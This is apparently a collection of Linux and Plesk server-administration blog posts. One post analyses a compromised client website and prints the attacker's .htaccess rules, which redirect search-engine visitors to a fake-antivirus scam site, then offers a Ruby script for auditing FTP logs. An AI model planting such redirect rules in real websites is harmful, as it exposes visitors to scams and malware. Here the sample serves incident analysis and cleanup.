linux + ruby on rails = love

We alreay know how to extract files from Plesk backup with mpack, but if you do receive “File size limit exceeded” error, it can be from the following reasons:

• Your file system doesn’t have LFS (large file support) support
• OS limits (limits on the system resources imposed by your administrator)
• mpack is not compiled with LFS

Check that your filesystem supports files bigger than 2GB (create a test file with “dd” command).

[vitalie@silver ~]$ dd if=/dev/zero of=test.bin bs=1G count=3 # create 3GB file

Then check your file size limits with ulimit command:

[vitalie@silver ~]$ ulimit -a | grep '^file size'
file size               (blocks, -f) unlimited

You can adjust limits from /etc/security/limits.conf, read file comments on how to do it, or read this article:
http://www.cyberciti.biz/faq/file-size-limit-exceeded-error-under-linux-and-solution/

If none above limits you, then the problems comes from mpack, it doesn’t have suport for large files (>2GB).

The guys from the Plesk recommends to grep the backup file, to find begin and end of the file in archive:
http://kb.parallels.com/en/1757

This solutions is not appropriate for large backup files, we’ll just recompile mpack to support large files.

Grab mpack’s RPM source from the Dag’s repository
http://dag.wieers.com/rpm/packages/mpack/mpack-1.6-2.rf.src.rpm

install it:

[vitalie@silver ~]$ rpm -ivh mpack-1.6-2.rf.src.rpm
[...]

Then modify mpack.spec and add the following code after “%build”:

export CFLAGS="-D_FILE_OFFSET_BITS=64"

Then rebuild the package and install it:

[vitalie@silver ~] rpm -ba mpack.spec
[...]
[vitalie@silver ~] rpm -Uvh --force mpack-1.6-3.rf.i386.rpm
[...]

References:

• Linux PAM
• jperalta.wordpress.com
• www.cyberciti.biz

Today the website of one of the clients was blacklisted by Google by containing malicious software that downloads and installs without user’s consent. Google displayed “This site may harm your computer” under website in the results page.

Analyzing site’s sources we found obfuscated JavaScript code inserted near body, html tags in .html, .php, .tpl files and a .htaccess file with following content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://real-antispyware.info/0/go.php?sid=2 [R,L]

Hmm, visitors from search engines were redirected to real-antispyware.info. This website is a scam that shows some JavaScript animation fulling the user with a message that his computer is infected and prompts him to download and install a fake AntiVirus.

Analyzing IP addresses from ftp logs we found connections from Russia and China that altered client’s website. Somehow they got user’s ftp password (it can be done in so many ways: weak password, traffic sniffing, virus, keylogger, trojan, …) and they altered website files.

You can use this simple Ruby script to analyze your ftp logs. By default it is configured for a Plesk server, and it will show suspicious lines (change IGNORE variables to fit your needs). You may need to install rubygems and geoip gem.

#!/usr/bin/ruby
 
require 'rubygems'
require 'geoip'
require 'zlib'
 
# hide logs from these countries
# Example: RO US
IGNORE_COUNTRIES = %w{RO US}
# free geoip database is not 100% accurate
# we may need to ignore a few ip addresses
IGNORE_IP = %w{127.0.0.1 127.0.0.2}
 
files = Dir.glob("/usr/local/psa/var/log/xferlog*")
geoip = GeoIP.new('/var/lib/GeoIP/GeoIP.dat')
 
def ip2country(geoip, ip)
  country = geoip.country(ip)[3]
end
 
ip_list = []
files.each do |filename|
  puts ""
  puts "Processing #{filename} ..."
 
  File.open(filename) do |f|
    input = f
    input = Zlib::GzipReader.new(f) if File.extname(filename) == ".gz"
 
    while line = input.gets do
      ip = line.split(/\s+/)[6]
 
      unless ip_list.include? ip
        country = ip2country(geoip, ip)
        unless IGNORE_COUNTRIES.include? country.upcase or IGNORE_IP.include? ip
          puts " [#{country} : #{ip}] => #{line}"
        end
        ip_list << ip
      end
   end
  end
end

Steps that needs to followed:

1. Change FTP password
2. Upload a clean copy from the backups of the website
3. Submit the website in the Webmaster’s Tools for reconsideration
4. Audit your company security: computers, firewalls, antiviruses, software, …

You may find useful diagnose tool from the Google (replace example.com with your domain):

http://www.google.com/safebrowsing/diagnostic?site=http://example.com

SMTP stands for Simple Mail Transfer Protocol, it was designed a long time ago when the Internet was a peaceful place. Today we are facing new challenges, so there should be new solutions.

One of the problem is SPAM messages, spammers are keeping to bombard us everyday with junk mails. We did invented black/white list to protect us from them.

If your clients are connecting from an ip address that’s listed in RBL lists (it’s not uncommon for ISPs that are using dynamic ip addresses) they can’t send messages through your server if you are using RBLs.

Disabling RBLs checks it’s not an option, we’ll configure an alternative port for relaying on port 1025 for the clients listed in RBLs.

You can just copy your smtp_psa file and customize it:

cd /etc/xinetd.d/
cp smtp_psa smtp_alt_psa
vim smtp_alt_psa

You need to change service name from smtp to smtp-alt and remove rblsmptd command and it’s -r parameters, finally it should something like this:

# /etc/xinetd.d/smtp_alt_psa
service smtp-alt
{
        socket_type     = stream
        protocol        = tcp
        wait            = no
        disable         = no
        user            = root
        instances       = UNLIMITED
        server          = /var/qmail/bin/tcp-env
        server_args     = -Rt0 /var/qmail/bin/relaylock /var/qmail/bin/qmail-smtpd /var/qmail/bin/smtp_auth /var/qmail/bin/true /var/qmail/bin/cmd5checkpw /var/qmail/bin/true
}

Append the new service to /etc/services:

smtp-alt        1025/tcp        
smtp-alt        1025/udp

And restart the xinetd service:

[root@sirius xinetd.d]# /etc/init.d/xinetd restart
Stopping xinetd:                                           [  OK  ]
Starting xinetd:                                           [  OK  ]

Verify your configuration with telnet command:

[root@sirius xinetd.d]# telnet localhost 1025
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 sirius.example.net ESMTP
 
# Ctr+] and quit to exit telnet

Now, instruct your clients to change port in SMTP settings from 25 to 1025, they will be able to send mails through your server even you are using RBL lists.

FreeImage is not yet available as RPM on CentOS/RHEL, so we’ll create one.

Before installing required libraries by FreeImage, configure yum to use Dag’s repositories, see this post how it can be done.

Learn how to setup your account to build RPMS as non-privileged user:
http://www.cherpec.com/2009/01/build-rpms-as-simple-user/

[root@lynx ~] yum install libjpeg-devel libpng-devel libtiff-devel libmng-devel openexr-devel zlib-devel
 
[...]

Next, download the following files from FreeImage’s website and put them in your SOURCES directory:

• FreeImage3110.zip
• FreeImage3110.pdf

And download freeimage.spec and place it in the SPECS directory.

Now, you are ready to build FreeImage, switch to SPECS directory and build FreeImage package:

[joe@lynx SPECS]$ rpmbuild -ba freeimage.spec
 
[...]
 
+ umask 022
+ cd /home/joe/rpmbuild/BUILD
+ cd FreeImage
+ DOCDIR=/home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ export DOCDIR
+ rm -rf /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ /bin/mkdir -p /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ cp -pr FreeImage3110.pdf /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot/usr/share/doc/freeimage-3.11.0
+ exit 0
Provides: libfreeimage.so.3()(64bit)
Requires(rpmlib): rpmlib(CompressedFileNames) <= 3.0.4-1 rpmlib(PayloadFilesHavePrefix) <= 4.0-1
Requires: libc.so.6()(64bit) libc.so.6(GLIBC_2.2.5)(64bit) libc.so.6(GLIBC_2.3)(64bit) libgcc_s.so.1()(64bit) libgcc_s.so.1(GCC_3.0)(64bit) libstdc++.so.6()(64bit) libstdc++.so.
Processing files: freeimage-debuginfo-3.11.0-1
Checking for unpackaged file(s): /usr/lib/rpm/check-files /home/joe/rpmbuild/tmp/freeimage-3.11.0-buildroot
Wrote: /home/joe/rpmbuild/SRPMS/freeimage-3.11.0-1.src.rpm
Wrote: /home/joe/rpmbuild/RPMS/x86_64/freeimage-3.11.0-1.x86_64.rpm
Wrote: /home/joe/rpmbuild/RPMS/x86_64/freeimage-debuginfo-3.11.0-1.x86_64.rpm

It’s not recommended to build your RPMS as root. You can build them as simple user, to accomplish this, you need to create a file called .rpmmacros in your home directory (we’ll assume that your user name is joe and your home directory is /home/joe):

# ~/.rpmmacros
%_topdir /home/joe/rpmbuild
%_tmppath %{_topdir}/tmp

Then create required directories:

[joe@lynx ~]$ mkdir -p ~/rpmbuild/{BUILD,RPMS/{noarch,i386,i586,i686,x86_64},SOURCES,SPECS,SRPMS,tmp}

You are ready to build your RPMS as simple user.

Sometimes you need to rebuild all your httpd.include files, it can be done with websrvmng command:

/usr/local/psa/admin/bin/websrvmng -av

Rename it’s handy command from util-linux package when you need to rename multiple files. From the manual:

NAME
       rename - Rename files
SYNOPSIS
       rename from to file...
DESCRIPTION
       rename will rename the specified files
       by replacing the first occurrence of
       from in their name by to.
...

Example usage:

[vitalie@silver london]$ ls -1
DSC00967.JPG
DSC00968.JPG
DSC00969.JPG
DSC00970.JPG
DSC00971.JPG
[vitalie@silver london]$ rename DSC00 london_ *.JPG
[vitalie@silver london]$ ls -1
london_967.JPG
london_968.JPG
london_969.JPG
london_970.JPG
london_971.JPG

If your server allows recursive queries it can be exploited by malicious users. It should be restricted only to ip addresses from your local nets.

To accomplish this, edit your /etc/named.conf and specify in “options” section which ACL are allowed to run recursive queries with allow-recursion option:

# /etc/named.conf
acl localnets { 127.0.0.1; 192.168.0.0/24; };
 
options {
...
allow-recursion { localnets; };
...
};

then restart bind server:

[root@red ~]# /etc/init.d/named restart
Stopping named: .                     [  OK  ]
Starting named:                       [  OK  ]

In Plesk it can be done from the Control Panel:
Server->DNS Settings->DNS Preferences->Allow recursion
and choose localhost or localnets.

Open your /etc/modprobe.conf file and append:

# Turn off IPv6
alias net-pf-10 off
alias ipv6 off

Then restart your server.

Lame server is when a NS record for a domain specifies a server which is not authoritative for that domain.

To keep your logs clean from lame server messages (/var/log/messages):

[...]
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 15:10:50 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
Nov 16 19:43:25 srv named[99]: lame server resolving 'abc.com' (in 'abc.com'?): 1.2.3.4#53
[...]

Edit your /etc/named.conf and add:

logging {
  category lame-servers { null; };
};

Then restart bind daemon.